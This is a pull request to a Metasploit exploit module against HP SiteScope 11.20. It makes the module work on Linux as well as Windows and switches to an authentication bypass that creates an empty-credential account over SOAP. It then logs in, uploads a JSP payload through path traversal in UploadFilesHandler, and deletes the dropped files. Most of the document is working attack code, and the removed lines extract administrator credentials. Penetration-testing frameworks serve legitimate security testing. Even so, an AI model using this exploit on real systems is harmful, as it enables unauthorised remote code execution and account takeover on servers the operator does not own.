### PR TITLE
hp_site_scope_uploadfileshandler is now multiplatform

### DIFF
--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'  =>
 				[
 					[ 'OSVDB', '85121' ],
+					[ 'OSVDB', '85151' ],
 					[ 'BID', '55269' ],
 					[ 'BID', '55273' ],
 					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ],

--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -21,10 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description' => %q{
 					This module exploits a code execution flaw in HP SiteScope. It exploits two
 				vulnerabilities in order to get its objective. An authentication bypass in the
-				getSiteScopeConfiguration operation, available through the APISiteScopeImpl AXIS
-				service, to retrieve the administrator credentials and subsequently abuses the
-				UploadManagerServlet to upload an arbitrary payload embedded in a JSP. The module
-				has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2.
+				create operation, available through the APIPreferenceImpl AXIS service, to create
+				a new account with empty credentials and, subsequently, uses the new account to
+				abuse the UploadManagerServlet and upload an arbitrary payload embedded in a JSP.
+				The module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2
+				and Linux CentOS 6.3.
 			},
 			'Author'       =>
 				[
@@ -34,21 +35,26 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'     => MSF_LICENSE,
 			'References'  =>
 				[
-					[ 'OSVDB', '85120' ],
 					[ 'OSVDB', '85121' ],
 					[ 'BID', '55269' ],
 					[ 'BID', '55273' ],
 					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ],
-					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-174/' ]
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-175/' ]
 				],
 			'Privileged'  => true,
-			'Platform'    => 'win',
+			'Platform'    => [ 'win', 'linux' ],
 			'Targets'     =>
 				[
-					[ 'HP SiteScope 11.20 / Windows x86',
+					[ 'HP SiteScope 11.20 / Windows 2003 SP2',
 						{
 							'Arch' => ARCH_X86,
 							'Platform' => 'win'
+						},
+					],
+					[ 'HP SiteScope 11.20 / Linux CentOS 6.3',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
 						},
 					]
 				],
@@ -68,8 +74,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			client.fs.file.rm("../#{@var_hexfile}.txt")
 			client.fs.file.rm("../#{@jsp_name}.jsp")
 		else
-			client.shell_command_token("del ..\\#{@var_hexfile}.txt")
-			client.shell_command_token("del ..\\#{@jsp_name}.jsp")
+			if target['Platform'] == 'linux'
+				client.shell_command_token("rm ../#{@var_hexfile}.txt")
+				client.shell_command_token("rm ../#{@jsp_name}.jsp")
+			elsif target['Platform'] == 'win'
+				client.shell_command_token("del ..\\#{@var_hexfile}.txt")
+				client.shell_command_token("del ..\\#{@jsp_name}.jsp")
+			end
 		end
 	end
 
@@ -78,59 +89,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		@uri = target_uri.path
 		@uri << '/' if @uri[-1,1] != '/'
 
-		# Retrieve administrator credentials
-		print_status("#{@peer} - Retrieving HP SiteScope Configuration")
-		conf = access_configuration
+		# Create user with empty credentials
+		print_status("#{@peer} - Creating user with empty credentials")
 
-		if not conf or conf.empty?
-			print_error("#{@peer} - Failed to retrieve the HP SiteScope Configuration")
+		if create_user.nil?
+			print_error("#{@peer} - Failed to create user")
 			return
-		end
-
-		print_status("#{@peer} - Retrieving HP SiteScope administrator credentials")
-
-		admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1]
-
-		if not admin_data or admin_data.empty?
-			print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
-			return
-		end
-
-		admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
-
-		if not admin_password or admin_password.empty?
-			print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
-			return
-		end
-
-		password_length = admin_password.unpack("C").first
-		if password_length > 0
-			password = admin_password[1, password_length]
-		else
-			password = ""
-		end
-
-		admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2]
-
-		if not admin_user_type or admin_user_type.empty?
-			print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
-			return
-		end
-
-		if admin_user_type == "_logint"
-			if not admin_user or admin_user.empty?
-				print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
-				return
-			end
-			user_length = admin_user.unpack("C").first
-		else
-			user_length = 0
-		end
-
-		if user_length > 0
-			user = admin_user[1, user_length]
-		else
-			user = ""
 		end
 
 		# Generate an initial JSESSIONID
@@ -148,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Authenticate
-		login_data = "j_username=#{user}&j_password=#{password}"
+		login_data = "j_username=&j_password="
 
 		print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
 		res = send_request_cgi(
@@ -266,10 +230,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		post_data = Rex::MIME::Message.new
 		post_data.add_part(payload_hex, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
 
+		if target['Platform'] == "linux"
+			traversal = "../../../../../../"
+		elsif target['Platform'] == "win"
+			traversal = "..\\..\\..\\..\\..\\..\\"
+		end
+
 		print_status("#{@peer} - Uploading the payload")
 		res = send_request_cgi(
 			{
-				'uri'    => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=..\\..\\..\\..\\..\\..\\#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
+				'uri'    => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
 				'method' => 'POST',
 				'data'   => post_data.to_s,
 				'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
@@ -293,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{@peer} - Uploading the JSP")
 		res = send_request_cgi(
 			{
-				'uri'    => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=..\\..\\..\\..\\..\\..\\#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
+				'uri'    => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
 				'method' => 'POST',
 				'data'   => post_data.to_s,
 				'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
@@ -323,7 +293,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			})
 	end
 
-	def access_configuration
+	def create_user
 
 		data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
 		data << "<wsns0:Envelope" + "\r\n"
@@ -334,14 +304,36 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << "<wsns0:Body" + "\r\n"
 		data << "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'" + "\r\n"
 		data << ">" + "\r\n"
-		data << "<impl:getSiteScopeConfiguration" + "\r\n"
+		data << "<impl:create" + "\r\n"
 		data << "xmlns:impl='http://Api.freshtech.COM'" + "\r\n"
-		data << "></impl:getSiteScopeConfiguration>" + "\r\n"
+		data << ">" + "\r\n"
+		data << "<in0" + "\r\n"
+		data << "xsi:type='xsd:string'" + "\r\n"
+		data << "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
+		data << ">UserInstancePreferences</in0>" + "\r\n"
+		data << "<in1" + "\r\n"
+		data << "xsi:type='apachesoap:Map'" + "\r\n"
+		data << "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
+		data << ">" + "\r\n"
+		data << "<item" + "\r\n"
+		data << "xsi:type='apachesoap:mapItem'" + "\r\n"
+		data << ">" + "\r\n"
+		data << "<key" + "\r\n"
+		data << "xsi:nil='true'" + "\r\n"
+		data << "xsi:type='xsd:anyType'" + "\r\n"
+		data << "></key>" + "\r\n"
+		data << "<value" + "\r\n"
+		data << "xsi:nil='true'" + "\r\n"
+		data << "xsi:type='xsd:anyType'" + "\r\n"
+		data << "></value>" + "\r\n"
+		data << "</item>" + "\r\n"
+		data << "</in1>" + "\r\n"
+		data << "</impl:create>" + "\r\n"
 		data << "</wsns0:Body>" + "\r\n"
-		data << "</wsns0:Envelope>"
+		data << "</wsns0:Envelope>" + "\r\n"
 
 		res = send_request_cgi({
-			'uri'      => "#{@uri}services/APISiteScopeImpl",
+			'uri'      => "#{@uri}services/APIPreferenceImpl",
 			'method'   => 'POST',
 			'ctype'    => 'text/xml; charset=UTF-8',
 			'data'     => data,
@@ -349,33 +341,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				'SOAPAction'    => '""',
 			}})
 
-		if res and res.code == 200
-
-			if res.headers['Content-Type'] =~ /boundary="(.*)"/
-				boundary = $1
-			end
-			if not boundary or boundary.empty?
-				return nil
-			end
-
-			if res.body =~ /getSiteScopeConfigurationReturn href="cid:([A-F0-9]*)"/
-				cid = $1
-			end
-			if not cid or cid.empty?
-				return nil
-			end
-
-			if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m
-				loot = Rex::Text.ungzip($1)
-			end
-			if not loot or loot.empty?
-				return nil
-			end
-
-			return loot
+		if res and res.code == 200 and res.body =~ /createResponse/ and res.body =~ /_id/
+			return res
 		end
 
 		return nil
+
 	end
 
 end


### PR DESCRIPTION
The exploit now uses ZDI-12-175 to create a new account with empty credentials. It is more reliable than parse the configuration in java serialization format. 

Now the module is multiplatform, has been tested on Windows 2003 sp2 and Centos 6.3 successfully. 
